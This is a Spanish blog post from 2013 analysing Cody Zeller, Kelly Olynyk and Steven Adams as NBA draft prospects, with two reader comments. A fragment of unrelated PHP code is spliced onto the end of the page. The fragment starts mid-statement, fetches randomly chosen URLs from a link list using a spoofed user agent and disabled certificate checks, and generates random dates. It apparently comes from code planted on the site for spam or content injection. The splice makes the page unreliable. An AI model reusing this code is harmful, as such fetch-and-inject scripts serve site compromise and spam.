Los centers de la March Madness

23 de March de 2013 por melo15

Tras el análisis de los guards y de los forwards que participan en la March Madness, llegamos finalmente al de los centers. Un análisis un poco corto debido a la falta de calidad por la ausencia de jugadores como Nerlens Noel, Alex Len  o Isaiah Austin. Los dos primeros, firmes candidatos a la lotería.

Cody Zeller:  Pívot
Universidad: Indiana
Altura: 2’11
Comparación: Pau Gasol
Estadísticas:  17pp, 8rp y 1tp

Cody Zeller no es el típico pívot que ha aparecido estos últimos años en la NBA sino justo todo lo contrario.

Estamos ante un jugador débil físicamente y con una falta de quilos y explosividad un poco preocupante. A pesar de ello Zeller se las ha ingeniado para sorprender a todos los scouts gracias a su rapidez, eficacia y habilidad. Si algo diferencia a Zeller del prototipo de pívot americano es su clase y juego en el poste. Gran juego de pies, ágil, habilidoso, eficiente…, Zeller lo tiene todo para ser dominante en el poste. Además este año ha mejorado su tiro y ha ganado algo de quilos y músculo.

Sin embargo el jugador de Indiana ha de fortalecerse aún más y mejorar en el rebote y en la intimidación, aspectos de su juego que debería pulir si quiere ser grande en la NBA.

Colectivamente  Indiana tiene un muy buen equipo con calidad y experiencia pero  le ha tocado un cuadro difícil y tengo dudas de si podrán convivir con la presión de ser uno de los máximos favoritos al título nacional. Les doy como candidatos fijos a los Elite Eight pero una vez ahí pueden pasar muchas cosas. 

Kelly Olynyk: Pívot
Universidad: Gonzaga
Altura: 2’13
Comparación: Spencer Hawes
Estadísticas: 17′ 7 pp 7 rp 1tp

Al igual que Zeller, Olynyk es un caso algo atípico en los últimos años en la NBA. 7 pies, buen juego ofensivo, buena cabeza… En teoría es una combinación a la que si se le añade agresividad y actitud suele convertirse en un muy buen proyecto de pívot. El problema radica en eso: ¿Tiene Olynyk la suficiente dureza para sobrevivir en la NBA y mostrarnos todo su arsenal ofensivo?

El jugador de Gonzaga tiene a todo el mundo impresionado con su combinación de habilidad, coordinación, eficacia y rango de tiro. A pesar de eso, surgen grandes dudas acerca de sus capacidades físicas (incluso inferiores a las de Zeller) y de su falta de rudeza y agresividad en la zona o cuando va al rebote, algo de vital importancia si quieres ser un pívot dominante en la NBA.

Ofensivamente Olynyk lo tiene todo: buen toque en el poste y con muchos recursos, muy bueno con  los tiros libres (82%), rango de tiro muy elevado (33% T3) y buen pasador. Pero también acusa una falta de explosividad, fuerza y agresividad un poco preocupantes y que le podrían hacer bajar unos cuantos puestos en el Draft.

Los Bulldogs de Gonzaga son uno de los equipos a batir en la March Madness. Han llevado a cabo una gran temporada regular y están situados  en el cuadro más fácil, si no hay sorpresas son claros favoritos para llegar a la Final Four.

Steven Adams: Pívot
Universidad: Pittsburgh
Altura: 2’12
Comparación:
Estadísticas: 7pp 6’2rp 2tp 

El pívot neozelandés ha disputado su primer año en la universidad proveniente directamente desde un instituto de Nueva Zelanda. La adaptación ha sido dura y aún está aprendiendo muchos de los conceptos que lo han de convertir en un pívot muy a tener en cuenta en el futuro.

Al contrario que los dos jugadores anteriores, Steven Adams es un jugador muy físico y muy duro que tiene en la defensa su punto fuerte. Por contra, su juego ofensivo es muy limitado y durante buena parte de la temporada se ha mostrado totalmente perdido en los esquemas de su equipo. De todas maneras, poco a poco está mejorando en este aspecto por lo que uno o dos años más en la universidad podrían venirle muy bien. Una amplia mejora en su juego ofensivo unido a un perfeccionamiento de su defensa le podría hacer TOP-10 en el draft de 2014.

Los Panthers llegaban a la March Madness como uno de los 10 mejores equipos defensivos del país. Sin embargo, su irregularidad ofensiva apareció en todo su esplendor y cayeron eliminados en primera ronda ante Wichita. Steven Adams fue el mejor de su equipo con 13 puntos y 11 rebotes.

Comenta

2 comentarios a esta entrada

  1. Denise dice:
    #1

    Hey Melo, en la mayoría de mocks draft 2013, ponen a otros 2 centers en el Top 10, un tal Alex Len y un tal Willie Cauley-Stein, ¿que tal son esos dos jugadores?

      Citar

  2. Melo15 dice:
    #2

    Alex Len es candidato a lottery pick y es un center muy clasico, mas de 2’10, fuerte, buna envergadura, buen tiro de 5 metros. Esta promediando unos 12 puntos y 8 rebotes, es buen taponador, 2 por partido, aunque le falta un poco de energía y es un poco pasivo, hay momentos que parece que no este jugando.
    Tiene potencial de pívot titular no creo que llegue a mucho mas.
    I al otro no lo he visto casi nada o nada, pero me suena que se presentara el año que viene.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>